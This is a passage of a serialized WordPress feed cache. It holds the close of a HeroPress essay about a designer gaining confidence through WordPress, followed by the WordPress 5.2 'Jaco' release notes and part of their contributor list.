much more than I could have anticipated. It was like a massive weight on my shoulders. As long as work kept me in my comfort zone, I was fine. But anything outside of that brought out my anxiety.</p>\n<p>Sure, I had achieved some level of success at a young age (with a hobby site even going <a href="https://en.wikipedia.org/wiki/Surge_(drink)#Revival">viral</a>). I had plenty of work, I even moved out of my parent’s house. But I also feared the unknown. I hadn’t been a very good student in high school and had zero confidence in my ability to learn something more advanced.</p>\n<p>At the same time, that fear was joined by a great deal of frustration. I started struggling to build larger sites using those same tired methods. And maintaining them was even worse.</p>\n<p>In all, I was stressed out and felt stuck in a dead end. The passion I once had for design and code had vanished. I was in desperate need of a new direction.</p>\n<h3>A Glimmer of Light</h3>\n<p>It’s amazing how, just when things feel their darkest, a little bit of light shows up and sparks something in you. For me, WordPress was like a tiny matchstick in a pitch-black cave.</p>\n<p>Somewhere around 2005, I installed an early version of WordPress as a playful experiment. At the time, I saw other content management systems starting to pop up, but wasn’t really impressed. Frankly, the sites running them all looked the same.</p>\n<p>But tearing apart a WordPress theme was different. I knew nothing about PHP, but found that the templates were pretty easy to follow. I liked that I could make design changes without too much trouble. Even if I broke something, I was (usually) able to bring things back to their previous state.</p>\n<p>Still, I wasn’t ready or willing to abandon my old-school techniques for building sites just yet (I even jettisoned the CSS layouts from my theme and replaced them with tables). WordPress was something I used on the periphery. I created a few simple blogs for clients, but hadn’t really thought of using it for anything more.</p>\n<p>In fact, it would be a few more years until I was finally ready to make a change.</p>\n<h3>A New Beginning</h3>\n<p>2010 was a banner year in my career. It was the year where I, inspired by my wife and newborn daughter, started to really confront my fears. I had grown completely tired of the way I had been doing things. This was the year I became convinced that WordPress was the game-changer I needed.</p>\n<p>As the software matured, more developers started using it to run entire sites – not just traditional blogs. I was very much intrigued, even excited, about the possibility of what I could achieve in terms of both design and functionality.</p>\n<p>So, I convinced one of my agency clients to let me try using WordPress on a project. Things went well enough that we decided to start using it more often. And, for me, it was like that little matchstick in the dark cave turned into a huge beacon.</p>\n<p>The more I used WordPress, the more curious I became about what else it could do. I found myself not only being unafraid to learn, but actually <em>motivated</em> to do so.</p>\n<p>By the next year, I had moved almost exclusively to WordPress. That led to another watershed moment: Attending my first WordCamp.</p>\n<h3>Discovering That I Wasn&#8217;t Alone</h3>\n<p>Visiting <a href="https://2011.philly.wordcamp.org">WordCamp Philadelphia 2011</a> was an eye-opening experience. This was not the buttoned-down, corporate atmosphere that brought me discomfort years earlier. Instead, I found a casual, welcoming vibe that made me feel like I belonged.</p>\n<p>The crowd was diverse in just about every way imaginable. And I met people who were all over the map when it came to knowledge of WordPress. Some were complete newbies, others were experts. But regardless of their skill level or experience, they all gathered in the same place. It struck me that I was now a part of something unique.</p>\n<p>This burgeoning community, coupled with great software, had all of the sudden put me on a path that I never imagined possible. It made me want to learn all that I could and be a part of something bigger than myself.</p>\n<p>Before too long, I discovered a confidence I never felt before. I was not only building better websites than I ever had, I was also eager to be a part of the WordPress community. And, despite being a bit shy, I even spoke at WordCamp Baltimore in <a href="https://2012.baltimore.wordcamp.org/speakers/#eric-karkovack">2012</a>.</p>\n<p>I felt like anything was possible.</p>\n<h3>Opportunity Knocks</h3>\n<p>As my experience with both WordPress and its community has grown, it has opened up some amazing opportunities. For one, it gave me the courage to try and fulfill another lifelong dream: to become a writer.</p>\n<p>I started off by submitting an article to <a href="https://speckyboy.com/how-to-deal-with-creative-differences-with-clients/">Speckyboy Web Design Magazine</a>, not really knowing what to expect. When it was published, I was incredibly excited. So, I kept on writing. And each time, site editor Paul Andrew kept on publishing my work.</p>\n<p>Even more mind-boggling is that, eventually, this led to a regular <a href="https://speckyboy.com/author/erickarkovack/">role</a> with the site. I’ve published hundreds of articles and have enjoyed every minute of it. And more writing gigs have followed. My topic of choice? WordPress, of course!</p>\n<p>When it comes to my design business, I’m no longer afraid to push those boundaries. I’ve built and maintained hundreds of WordPress sites that run the gamut in terms of size and functionality. Yes, including the formerly fear-inducing ecommerce.</p>\n<p>But I know that, without the confidence boost I received by working with WordPress, none of this would have been possible. I am beyond grateful, and so glad that I found it at a pivotal time in my life.</p>\n<h3>What I&#8217;ve Learned</h3>\n<p>So, what does this all mean? I’ve given it a lot of thought.</p>\n<p>There are still days when I’m overwhelmed and stressed out. But even then, I tell myself how I lucky I am to do what I do each day. And somehow, I have maintained a passion for my work that I think is here to stay.</p>\n<p>But the biggest lesson I’ve learned, and the thing I’d like to share with you, is to give yourself a chance to learn and grow. Sometimes, the unknown can be scary – I get it. I was so afraid of the fact that I wasn’t formally trained and that I didn’t have the knowledge I needed to go further. I was scared that if I failed to learn what I needed to know that I’d be left in the dust.</p>\n<p>Yet, that’s the amazing thing about WordPress and web design in general. There are so many great resources out there you can learn from. And there is a community out there who is willing to help and share what they know.</p>\n<p>Everything is right there in front of us. All it takes is a willingness to try.</p>\n<div class="rtsocial-container rtsocial-container-align-right rtsocial-horizontal"><div class="rtsocial-twitter-horizontal"><div class="rtsocial-twitter-horizontal-button"><a title="Tweet: Broadening My Horizons Through WordPress" class="rtsocial-twitter-button" href="https://twitter.com/share?text=Broadening%20My%20Horizons%20Through%20WordPress&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fbroadening-my-horizons-through-wordpress%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-fb-horizontal fb-light"><div class="rtsocial-fb-horizontal-button"><a title="Like: Broadening My Horizons Through WordPress" class="rtsocial-fb-button rtsocial-fb-like-light" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fbroadening-my-horizons-through-wordpress%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-linkedin-horizontal"><div class="rtsocial-linkedin-horizontal-button"><a class="rtsocial-linkedin-button" href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fbroadening-my-horizons-through-wordpress%2F&title=Broadening+My+Horizons+Through+WordPress" rel="nofollow" target="_blank" title="Share: Broadening My Horizons Through WordPress"></a></div></div><div class="rtsocial-pinterest-horizontal"><div class="rtsocial-pinterest-horizontal-button"><a class="rtsocial-pinterest-button" href="https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/broadening-my-horizons-through-wordpress/&media=https://heropress.com/wp-content/uploads/2020/05/050819-min-150x150.jpg&description=Broadening My Horizons Through WordPress" rel="nofollow" target="_blank" title="Pin: Broadening My Horizons Through WordPress"></a></div></div><a rel="nofollow" class="perma-link" href="https://heropress.com/essays/broadening-my-horizons-through-wordpress/" title="Broadening My Horizons Through WordPress"></a></div><p>The post <a rel="nofollow" href="https://heropress.com/essays/broadening-my-horizons-through-wordpress/">Broadening My Horizons Through WordPress</a> appeared first on <a rel="nofollow" href="https://heropress.com">HeroPress</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 08 May 2019 12:00:43 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Eric Karkovack";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:43;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:44:"WordPress.org blog: WordPress 5.2 “Jaco”";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6925";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:40:"https://wordpress.org/news/2019/05/jaco/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:29862:"<h2>Keeping Sites Safer</h2>\n\n\n\n<img src="https://i1.wp.com/wordpress.org/news/files/2019/05/about_maintain-wordpress-cropped.png?fit=632%2C500&ssl=1" alt="" class="wp-image-6926" />\n\n\n\n<p>Version 5.2 of WordPress, named “Jaco” in honor of renowned and revolutionary jazz bassist Jaco Pastorius, is available for download or update in your WordPress dashboard. New features in this update make it easier than ever to fix your site if something goes wrong.</p>\n\n\n\n<p>There are even more robust tools for identifying and fixing configuration issues and fatal errors. Whether you are a developer helping clients or you manage your site solo, these tools can help get you the right information when you need it.</p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h3>Site Health Check</h3>\n\n\n\n<div class="wp-block-image"><img src="https://i2.wp.com/wordpress.org/news/files/2019/05/about_site-health.png?resize=205%2C143&ssl=1" alt="" class="wp-image-6927" width="205" height="143" /></div>\n\n\n\n<p>Building on the <a href="https://wordpress.org/news/2019/02/betty/">Site Health</a> features introduced in 5.1, this release adds two new pages to help debug common configuration issues. It also adds space where developers can include debugging information for site maintainers.</p>\n\n\n\n<div class="wp-block-spacer"></div>\n\n\n\n<h3>PHP Error Protection</h3>\n\n\n\n<div class="wp-block-image"><img src="https://i1.wp.com/wordpress.org/news/files/2019/05/about_error-protection.png?resize=202%2C228&ssl=1" alt="" class="wp-image-6930" width="202" height="228" /></div>\n\n\n\n<p>This administrator-focused update will let you safely fix or manage fatal errors without requiring developer time. It features better handling of the so-called “white screen of death,” and a way to enter recovery mode, &nbsp;which pauses error-causing plugins or themes.</p>\n\n\n\n<div class="wp-block-spacer"></div>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>Improvements for Everyone</h2>\n\n\n\n<h3>Accessibility Updates</h3>\n\n\n\n<p>A number of changes work together to improve contextual awareness and keyboard navigation flow for those using screen readers and other assistive technologies.</p>\n\n\n\n<h3>New Dashboard Icons</h3>\n\n\n\n<p>Thirteen new icons including Instagram, a suite of icons for BuddyPress, and rotated Earth icons for global inclusion. Find them in the Dashboard and have some fun!</p>\n\n\n\n<h3>Plugin Compatibility Checks</h3>\n\n\n\n<p>WordPress will now automatically determine if your site’s version of PHP is compatible with installed plugins. If the plugin requires a higher version of PHP than your site currently uses, WordPress will not allow you to activate it, preventing potential compatibility errors.</p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>Developer Happiness</h2>\n\n\n\n<div class="wp-block-columns has-2-columns">\n<div class="wp-block-column">\n<p><a href="https://make.wordpress.org/core/2019/03/26/coding-standards-updates-for-php-5-6/"><strong>PHP Version Bump</strong></a><strong> </strong></p>\n\n\n\n<p>The minimum supported PHP version is now 5.6.20. As of WordPress 5.2*, themes and plugins can safely take advantage of namespaces, anonymous functions, and more!</p>\n</div>\n\n\n\n<div class="wp-block-column">\n<p><a href="https://make.wordpress.org/core/2019/04/24/developer-focused-privacy-updates-in-5-2/"><strong>Privacy Updates</strong></a><strong> </strong></p>\n\n\n\n<p>A new theme page template, a conditional function, and two CSS classes make designing and customizing the Privacy Policy page easier.</p>\n</div>\n</div>\n\n\n\n<div class="wp-block-columns has-2-columns">\n<div class="wp-block-column">\n<p><strong><a href="https://make.wordpress.org/core/2019/04/24/miscellaneous-developer-updates-in-5-2/">New Body Hook</a> </strong></p>\n\n\n\n<p>5.2 introduces a wp_body_open hook, which lets themes support injecting code right at the beginning of the &lt;body&gt; element.</p>\n</div>\n\n\n\n<div class="wp-block-column">\n<p><a href="https://make.wordpress.org/core/2019/03/25/building-javascript/"><strong>Building JavaScript</strong></a></p>\n\n\n\n<p>With the addition of webpack and Babel configurations in the wordpress/scripts package, developers won&#8217;t have to worry about setting up complex build tools to write modern JavaScript.</p>\n</div>\n</div>\n\n\n\n<p><em>*If you are running an old version of PHP (less than 5.6.20), <a href="https://wordpress.org/support/update-php/">update your PHP</a> before installing 5.2.</em></p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>The Squad</h2>\n\n\n\n<p>This release was led by&nbsp;<a href="http://ma.tt/">Matt Mullenweg</a>, <a href="https://josepha.blog/">Josepha Haden Chomphosy</a>, and&nbsp;<a href="https://pento.net/">Gary Pendergast</a>. They were graciously supported by 327 generous volunteer contributors. Load a Jaco Pastorius playlist on your favorite music service and check out some of their profiles:</p>\n\n\n<a href="https://profiles.wordpress.org/aaroncampbell">Aaron D. Campbell</a>, <a href="https://profiles.wordpress.org/jorbin">Aaron Jorbin</a>, <a href="https://profiles.wordpress.org/adamsilverstein">Adam Silverstein</a>, <a href="https://profiles.wordpress.org/adamsoucie">Adam Soucie</a>, <a href="https://profiles.wordpress.org/oztaser">Adil &#214;ztaşer</a>, <a href="https://profiles.wordpress.org/ajitbohra">Ajit Bohra</a>, <a href="https://profiles.wordpress.org/schlessera">Alain Schlesser</a>, <a href="https://profiles.wordpress.org/aldavigdis">Alda Vigd&#237;s</a>, <a href="https://profiles.wordpress.org/alexdenning">Alex Denning</a>, <a href="https://profiles.wordpress.org/xavortm">Alex Dimitrov</a>, <a href="https://profiles.wordpress.org/akirk">Alex Kirk</a>, <a href="https://profiles.wordpress.org/viper007bond">Alex Mills</a>, <a href="https://profiles.wordpress.org/tellyworth">Alex Shiels</a>, <a href="https://profiles.wordpress.org/lexiqueen">Alexis</a>, <a href="https://profiles.wordpress.org/alexislloyd">Alexis Lloyd</a>, <a href="https://profiles.wordpress.org/allancole">allancole</a>, <a href="https://profiles.wordpress.org/allendav">Allen Snook</a>, <a href="https://profiles.wordpress.org/arena">Andr&#233;</a>, <a href="https://profiles.wordpress.org/andraganescu">andraganescu</a>, <a href="https://profiles.wordpress.org/afercia">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/andreamiddleton">Andrea Middleton</a>, <a href="https://profiles.wordpress.org/euthelup">Andrei Lupu</a>, <a href="https://profiles.wordpress.org/aandrewdixon">Andrew Dixon</a>, <a href="https://profiles.wordpress.org/aduth">Andrew Duthie</a>, <a href="https://profiles.wordpress.org/nacin">Andrew Nacin</a>, <a href="https://profiles.wordpress.org/azaozz">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/rarst">Andrey "Rarst" Savchenko</a>, <a href="https://profiles.wordpress.org/nosolosw">Andrés Maneiro</a>, <a href="https://profiles.wordpress.org/afragen">Andy Fragen</a>, <a href="https://profiles.wordpress.org/andizer">Andy Meerwaldt</a>, <a href="https://profiles.wordpress.org/aniketpatel">Aniket Patel</a>, <a href="https://profiles.wordpress.org/anischarolia">anischarolia</a>, <a href="https://profiles.wordpress.org/atimmer">Anton Timmermans</a>, <a href="https://profiles.wordpress.org/vanyukov">Anton Vanyukov</a>, <a href="https://profiles.wordpress.org/avillegasn">Antonio Villegas</a>, <a href="https://profiles.wordpress.org/antonypuckey">antonypuckey</a>, <a href="https://profiles.wordpress.org/aristath">Aristeides Stathopoulos</a>, <a href="https://profiles.wordpress.org/wpboss">Aslam Shekh</a>, <a href="https://profiles.wordpress.org/axaak">axaak</a>, <a href="https://profiles.wordpress.org/pixolin">Bego Mario Garde</a>, <a href="https://profiles.wordpress.org/empireoflight">Ben Dunkle</a>, <a href="https://profiles.wordpress.org/britner">Ben Ritner - Kadence Themes</a>, <a href="https://profiles.wordpress.org/bfintal">Benjamin Intal</a>, <a href="https://profiles.wordpress.org/billerickson">Bill Erickson</a>, <a href="https://profiles.wordpress.org/birgire">Birgir Erlendsson</a>, <a href="https://profiles.wordpress.org/bodohugobarwich">Bodo (Hugo) Barwich</a>, <a href="https://profiles.wordpress.org/gitlost">bonger</a>, <a href="https://profiles.wordpress.org/boonebgorges">Boone Gorges</a>, <a href="https://profiles.wordpress.org/bradleyt">Bradley Taylor</a>, <a href="https://profiles.wordpress.org/kraftbj">Brandon Kraft</a>, <a href="https://profiles.wordpress.org/brentswisher">Brent Swisher</a>, <a href="https://profiles.wordpress.org/burhandodhy">Burhan Nasir</a>, <a href="https://profiles.wordpress.org/cathibosco1">Cathi Bosco</a>, <a href="https://profiles.wordpress.org/chesio">chesio</a>, <a href="https://profiles.wordpress.org/chetan200891">Chetan Prajapati</a>, <a href="https://profiles.wordpress.org/chiaralovelaces">Chiara Magnani</a>, <a href="https://profiles.wordpress.org/chouby">Chouby</a>, <a href="https://profiles.wordpress.org/chrisvanpatten">Chris Van Patten</a>, <a href="https://profiles.wordpress.org/dswebsme">D.S. Webster</a>, <a href="https://profiles.wordpress.org/colorful-tones">Damon Cook</a>, <a href="https://profiles.wordpress.org/danielbachhuber">Daniel Bachhuber</a>, <a href="https://profiles.wordpress.org/danieltj">Daniel James</a>, <a href="https://profiles.wordpress.org/diddledan">Daniel Llewellyn</a>, <a href="https://profiles.wordpress.org/talldanwp">Daniel Richards</a>, <a href="https://profiles.wordpress.org/mte90">Daniele Scasciafratte</a>, <a href="https://profiles.wordpress.org/nerrad">Darren Ethier</a>, <a href="https://profiles.wordpress.org/drw158">Dave Whitley</a>, <a href="https://profiles.wordpress.org/davefx">DaveFX</a>, <a href="https://profiles.wordpress.org/davetgreen">davetgreen</a>, <a href="https://profiles.wordpress.org/davidbaumwald">David Baumwald</a>, <a href="https://profiles.wordpress.org/davidbinda">David Binovec</a>, <a href="https://profiles.wordpress.org/david.binda">David Binovec</a>, <a href="https://profiles.wordpress.org/dlh">David Herrera</a>, <a href="https://profiles.wordpress.org/dgroddick">David Roddick</a>, <a href="https://profiles.wordpress.org/get_dave">David Smith</a>, <a href="https://profiles.wordpress.org/folletto">Davide ''Folletto'' Casali</a>, <a href="https://profiles.wordpress.org/daxelrod">daxelrod</a>, <a href="https://profiles.wordpress.org/dkarfa">Debabrata Karfa</a>, <a href="https://profiles.wordpress.org/dekervit">dekervit</a>, <a href="https://profiles.wordpress.org/denis-de-bernardy">Denis de Bernardy</a>, <a href="https://profiles.wordpress.org/dmsnell">Dennis Snell</a>, <a href="https://profiles.wordpress.org/valendesigns">Derek Herman</a>, <a href="https://profiles.wordpress.org/pcfreak30">Derrick Hammer</a>, <a href="https://profiles.wordpress.org/designsimply">designsimply</a>, <a href="https://profiles.wordpress.org/dhanukanuwan">Dhanukanuwan</a>, <a href="https://profiles.wordpress.org/dharm1025">Dharmesh Patel</a>, <a href="https://profiles.wordpress.org/dianeco">Diane</a>, <a href="https://profiles.wordpress.org/diegoreymendez">diegoreymendez</a>, <a href="https://profiles.wordpress.org/dilipbheda">Dilip Bheda</a>, <a href="https://profiles.wordpress.org/odminstudios">Dima</a>, <a href="https://profiles.wordpress.org/dd32">Dion Hulse</a>, <a href="https://profiles.wordpress.org/dency">Dixita Dusara</a>, <a href="https://profiles.wordpress.org/iamdmitrymayorov">Dmitry Mayorov</a>, <a href="https://profiles.wordpress.org/ocean90">Dominik Schilling</a>, <a href="https://profiles.wordpress.org/drewapicture">Drew Jaynes</a>, <a href="https://profiles.wordpress.org/dsifford">dsifford</a>, <a href="https://profiles.wordpress.org/seedsca">ecotechie</a>, <a href="https://profiles.wordpress.org/etoledom">Eduardo Toledo</a>, <a href="https://profiles.wordpress.org/iseulde">Ella Van Durpe</a>, <a href="https://profiles.wordpress.org/edocev">Emil Dotsev</a>, <a href="https://profiles.wordpress.org/fabiankaegy">fabiankaegy</a>, <a href="https://profiles.wordpress.org/faisal03">Faisal Alvi</a>, <a href="https://profiles.wordpress.org/parsmizban">Farhad Sakhaei</a>, <a href="https://profiles.wordpress.org/flixos90">Felix Arntz</a>, <a href="https://profiles.wordpress.org/peaceablewhale">Franklin Tse</a>, <a href="https://profiles.wordpress.org/fuegas">Fuegas</a>, <a href="https://profiles.wordpress.org/garrett-eclipse">Garrett Hyder</a>, <a href="https://profiles.wordpress.org/garyj">Gary Jones</a>, <a href="https://profiles.wordpress.org/soulseekah">Gennady Kovshenin</a>, <a href="https://profiles.wordpress.org/sachyya-sachet">ghoul</a>, <a href="https://profiles.wordpress.org/girishpanchal">Girish Panchal</a>, <a href="https://profiles.wordpress.org/gziolo">Grzegorz Ziółkowski</a>, <a href="https://profiles.wordpress.org/wido">Guido Scialfa</a>, <a href="https://profiles.wordpress.org/gutendev">GutenDev <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/270d.png" alt="✍" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/3299.png" alt="㊙" class="wp-smiley" /></a>, <a href="https://profiles.wordpress.org/gwwar">gwwar</a>, <a href="https://profiles.wordpress.org/hannahmalcolm">Hannah Malcolm</a>, <a href="https://profiles.wordpress.org/hardik-amipara">Hardik Amipara</a>, <a href="https://profiles.wordpress.org/thakkarhardik">Hardik Thakkar</a>, <a href="https://profiles.wordpress.org/luehrsen">Hendrik Luehrsen</a>, <a href="https://profiles.wordpress.org/henrywright-1">Henry</a>, <a href="https://profiles.wordpress.org/henrywright">Henry Wright</a>, <a href="https://profiles.wordpress.org/ryanshoover">Hoover</a>, <a href="https://profiles.wordpress.org/ianbelanger">Ian Belanger</a>, <a href="https://profiles.wordpress.org/iandunn">Ian Dunn</a>, <a href="https://profiles.wordpress.org/ice9js">ice9js</a>, <a href="https://profiles.wordpress.org/zinigor">Igor Zinovyev</a>, <a href="https://profiles.wordpress.org/imath">imath</a>, <a href="https://profiles.wordpress.org/ixium">Ixium</a>, <a href="https://profiles.wordpress.org/jdgrimes">J.D. Grimes</a>, <a href="https://profiles.wordpress.org/jakeparis">jakeparis</a>, <a href="https://profiles.wordpress.org/cc0a">James</a>, <a href="https://profiles.wordpress.org/janak007">janak Kaneriya</a>, <a href="https://profiles.wordpress.org/jarred-kennedy">Jarred Kennedy</a>, <a href="https://profiles.wordpress.org/vengisss">Javier Villanueva</a>, <a href="https://profiles.wordpress.org/jayupadhyay01">Jay Upadhyay</a>, <a href="https://profiles.wordpress.org/jaydeep-rami">Jaydip Rami</a>, <a href="https://profiles.wordpress.org/jaymanpandya">Jayman Pandya</a>, <a href="https://profiles.wordpress.org/jdeeburke">jdeeburke</a>, <a href="https://profiles.wordpress.org/audrasjb">Jean-Baptiste Audras</a>, <a href="https://profiles.wordpress.org/jeffpaul">Jeff Paul</a>, <a href="https://profiles.wordpress.org/cheffheid">Jeffrey de Wit</a>, <a href="https://profiles.wordpress.org/miss_jwo">Jenny Wong</a>, <a href="https://profiles.wordpress.org/jeremyfelt">Jeremy Felt</a>, <a href="https://profiles.wordpress.org/endocreative">Jeremy Green</a>, <a href="https://profiles.wordpress.org/jeherve">Jeremy Herve</a>, <a href="https://profiles.wordpress.org/jitendrabanjara1991">jitendrabanjara1991</a>, <a href="https://profiles.wordpress.org/johnjamesjacoby">JJJ</a>, <a href="https://profiles.wordpress.org/joedolson">Joe Dolson</a>, <a href="https://profiles.wordpress.org/joemcgill">Joe McGill</a>, <a href="https://profiles.wordpress.org/joen">Joen Asmussen</a>, <a href="https://profiles.wordpress.org/j-falk">Johan Falk</a>, <a href="https://profiles.wordpress.org/johannadevos">Johanna de Vos</a>, <a href="https://profiles.wordpress.org/johnbillion">John Blackbourn</a>, <a href="https://profiles.wordpress.org/desrosj">Jonathan Desrosiers</a>, <a href="https://profiles.wordpress.org/jonathandejong">Jonathandejong</a>, <a href="https://profiles.wordpress.org/joneiseman">joneiseman</a>, <a href="https://profiles.wordpress.org/spacedmonkey">Jonny Harris</a>, <a href="https://profiles.wordpress.org/jonnybojangles">jonnybojangles</a>, <a href="https://profiles.wordpress.org/joostdevalk">Joost de Valk</a>, <a href="https://profiles.wordpress.org/jordesign">jordesign</a>, <a href="https://profiles.wordpress.org/koke">Jorge Bernal</a>, <a href="https://profiles.wordpress.org/jorgefilipecosta">Jorge Costa</a>, <a href="https://profiles.wordpress.org/keraweb">Jory Hogeveen</a>, <a href="https://profiles.wordpress.org/jcastaneda">Jose Castaneda</a>, <a href="https://profiles.wordpress.org/josephwa">josephwa</a>, <a href="https://profiles.wordpress.org/builtbynorthby">Josh Feck</a>, <a href="https://profiles.wordpress.org/joshuawold">JoshuaWold</a>, <a href="https://profiles.wordpress.org/joyously">Joy</a>, <a href="https://profiles.wordpress.org/jplojohn">jplo</a>, <a href="https://profiles.wordpress.org/jrtashjian">JR Tashjian</a>, <a href="https://profiles.wordpress.org/jrf">jrf</a>, <a href="https://profiles.wordpress.org/juiiee8487">Juhi Patel</a>, <a href="https://profiles.wordpress.org/juliarrr">juliarrr</a>, <a href="https://profiles.wordpress.org/kadamwhite">K. Adam White</a>, <a href="https://profiles.wordpress.org/kamataryo">KamataRyo</a>, <a href="https://profiles.wordpress.org/karinedo">Karine Do</a>, <a href="https://profiles.wordpress.org/katyatina">Katyatina</a>, <a href="https://profiles.wordpress.org/kelin1003">Kelin Chauhan</a>, <a href="https://profiles.wordpress.org/ryelle">Kelly Dwan</a>, <a href="https://profiles.wordpress.org/itzmekhokan">Khokan Sardar</a>, <a href="https://profiles.wordpress.org/killua99">killua99</a>, <a href="https://profiles.wordpress.org/ixkaito">Kite</a>, <a href="https://profiles.wordpress.org/kjellr">Kjell Reigstad</a>, <a href="https://profiles.wordpress.org/knutsp">Knut Sparhell</a>, <a href="https://profiles.wordpress.org/olein">Koji Kuno</a>, <a href="https://profiles.wordpress.org/obenland">Konstantin Obenland</a>, <a href="https://profiles.wordpress.org/xkon">Konstantinos Xenos</a>, <a href="https://profiles.wordpress.org/codemascot">Kʜᴀɴ (ಠ_ಠ)</a>, <a href="https://profiles.wordpress.org/laurelfulford">laurelfulford</a>, <a href="https://profiles.wordpress.org/lkraav">lkraav</a>, <a href="https://profiles.wordpress.org/lovingboth">lovingboth</a>, <a href="https://profiles.wordpress.org/lukecarbis">Luke Carbis</a>, <a href="https://profiles.wordpress.org/lgedeon">Luke Gedeon</a>, <a href="https://profiles.wordpress.org/lukepettway">Luke Pettway</a>, <a href="https://profiles.wordpress.org/maedahbatool">Maedah Batool</a>, <a href="https://profiles.wordpress.org/travel_girl">Maja Benke</a>, <a href="https://profiles.wordpress.org/malae">Malae</a>, <a href="https://profiles.wordpress.org/manzoorwanijk">Manzoor Wani</a>, <a href="https://profiles.wordpress.org/robobot3000">Marcin</a>, <a href="https://profiles.wordpress.org/iworks">Marcin Pietrzak</a>, <a href="https://profiles.wordpress.org/marcofernandes">Marco Fernandes</a>, <a href="https://profiles.wordpress.org/marco-peralta">Marco Peralta</a>, <a href="https://profiles.wordpress.org/mkaz">Marcus Kazmierczak</a>, <a href="https://profiles.wordpress.org/marekhrabe">marekhrabe</a>, <a href="https://profiles.wordpress.org/clorith">Marius Jensen</a>, <a href="https://profiles.wordpress.org/mbelchev">Mariyan Belchev</a>, <a href="https://profiles.wordpress.org/mapk">Mark Uraine</a>, <a href="https://profiles.wordpress.org/markcallen">markcallen</a>, <a href="https://profiles.wordpress.org/mechter">Markus Echterhoff</a>, <a href="https://profiles.wordpress.org/m-e-h">Marty Helmick</a>, <a href="https://profiles.wordpress.org/marybaum">marybaum</a>, <a href="https://profiles.wordpress.org/mattnyeus">mattnyeus</a>, <a href="https://profiles.wordpress.org/mdwolinski">mdwolinski</a>, <a href="https://profiles.wordpress.org/immeet94">Meet Makadia</a>, <a href="https://profiles.wordpress.org/melchoyce">Mel Choyce</a>, <a href="https://profiles.wordpress.org/mheikkila">mheikkila</a>, <a href="https://profiles.wordpress.org/wpscholar">Micah Wood</a>, <a href="https://profiles.wordpress.org/michelleweber">michelleweber</a>, <a href="https://profiles.wordpress.org/mcsf">Miguel Fonseca</a>, <a href="https://profiles.wordpress.org/mmtr86">Miguel Torres</a>, <a href="https://profiles.wordpress.org/simison">Mikael Korpela</a>, <a href="https://profiles.wordpress.org/mauteri">Mike Auteri</a>, <a href="https://profiles.wordpress.org/mikeschinkel">Mike Schinkel [WPLib Box project lead]</a>, <a href="https://profiles.wordpress.org/mikeschroder">Mike Schroder</a>, <a href="https://profiles.wordpress.org/mikeselander">Mike Selander</a>, <a href="https://profiles.wordpress.org/mikengarrett">MikeNGarrett</a>, <a href="https://profiles.wordpress.org/dimadin">Milan Dinić</a>, <a href="https://profiles.wordpress.org/0mirka00">mirka</a>, <a href="https://profiles.wordpress.org/lord_viper">Mobin Ghasempoor</a>, <a href="https://profiles.wordpress.org/mohadeseghasemi">Mohadese Ghasemi</a>, <a href="https://profiles.wordpress.org/saimonh">Mohammed Saimon</a>, <a href="https://profiles.wordpress.org/mor10">Morten Rand-Hendriksen</a>, <a href="https://profiles.wordpress.org/man4toman">Morteza Geransayeh</a>, <a href="https://profiles.wordpress.org/mmuhsin">Muhammad Muhsin</a>, <a href="https://profiles.wordpress.org/mukesh27">Mukesh Panchal</a>, <a href="https://profiles.wordpress.org/m_uysl">Mustafa Uysal</a>, <a href="https://profiles.wordpress.org/mzorz">mzorz</a>, <a href="https://profiles.wordpress.org/nfmohit">Nahid F. Mohit</a>, <a href="https://profiles.wordpress.org/naoki0h">Naoki Ohashi</a>, <a href="https://profiles.wordpress.org/nateallen">Nate Allen</a>, <a href="https://profiles.wordpress.org/greatislander">Ned Zimmerman</a>, <a href="https://profiles.wordpress.org/neobabis">Neokazis Charalampos</a>, <a href="https://profiles.wordpress.org/modernnerd">Nick Cernis</a>, <a href="https://profiles.wordpress.org/ndiego">Nick Diego</a>, <a href="https://profiles.wordpress.org/celloexpressions">Nick Halsey</a>, <a href="https://profiles.wordpress.org/jainnidhi">Nidhi Jain</a>, <a href="https://profiles.wordpress.org/nielslange">Niels Lange</a>, <a 